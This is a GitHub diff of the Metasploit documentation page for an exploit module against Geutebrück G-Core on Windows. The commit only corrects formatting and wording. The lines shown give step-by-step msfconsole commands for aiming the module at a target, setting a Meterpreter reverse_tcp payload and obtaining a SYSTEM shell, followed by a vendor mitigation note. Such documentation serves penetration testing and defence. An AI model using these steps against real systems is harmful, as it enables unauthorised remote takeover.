File tree Expand file tree Collapse file tree 1 file changed +2
-2
lines changed
documentation/modules/exploit/windows/http Expand file tree Collapse file tree 1 file changed +2
-2
lines changed Original file line number Diff line number Diff line change 10
10
4 . Start msfconsole
11
11
5 . Do: ``` use [exploit/windows/http/geutebrueck_gcore_x64_rce_bo] ```
12
12
6 . Do: ``` set rhost <your target ip> ```
13
- 7 . Do: ```set rport 13003``
13
+ 7 . Do: ``` set rport 13003 ```
14
14
8 . Do: ``` set payload windows/x64/meterpreter/reverse_tcp ```
15
15
9 . Do: ``` exploit ```
16
16
10 . You should get a shell as NT/SYSTEM.
@@ -60,4 +60,4 @@ msf exploit(geutebrueck_gcore_x64_rce_bo) > exploit
60
60
meterpreter >
61
61
```
62
62
## Mitigation
63
- Geutebrück released a new Version and an update for the affected version which should be installed to fix the described vulnerabilities.
63
+ Geutebrück released a new version and an update for the affected product which should be installed to fix the described vulnerabilities.
You can’t perform that action at this time.
0 commit comments